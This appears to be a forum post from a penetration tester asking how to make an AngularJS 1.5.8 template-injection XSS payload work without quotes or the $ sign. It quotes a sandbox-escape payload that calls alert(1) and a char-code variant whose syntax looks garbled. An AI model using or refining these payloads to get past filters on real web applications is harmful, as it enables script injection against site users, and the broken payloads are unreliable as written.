penetration test – Angular Expression/XSS-Payload without Quotes or “$”

I am really trying hard to exploit a Client Side Template Injection vulnerability in a webapp I am currently pentesting. Im so close to getting the payload to be executed, but I am stuck at the last little part^^. Would be great if you could help me out here.

I am able to inject a whole AngularJS expression into the html code of the serverresponse. Its a hidden input field and the value is the angular expression. We are talking about angular 1.5.8 and I already found a payload which is working with this version:

{{x = {'y':''.constructor.prototype}; x('y').charAt=().join;$eval('x=alert(1)');}}

Now the problem is that I cant use Quotes as they get output encoded and also I cant use the $ sign. It also gets output encoded as I noticed with my last try. My last idea which was working in JSfiddle was this payload:

{{$eval(x =,32,61,32,123,39,121,39,58,39,39,46,99,111,110,115,116,114,117,99,116,111,114,46,112,114,111,116,111,116,121,112,101,125,59,32,120,91,39,121,39,93,46,99,104,97,114,65,116,61,91,93,46,106,111,105,110,59,36,101,118,97,108,40,39,120,61,97,108,101,114,116,40,49,41,39,41,59))}}

I dont know angular very well so if anybody can think of a way how I could write the payload at the top without quotes or $ signs it would be really great and you would help me a lot^^. I just want to get it to work xD Perfect way to test it is JSfiddle (, this is for 1.4.6 but you can just change it). You just need to set it to angular 1.5.8 🙂

Thanks in advance and best regards!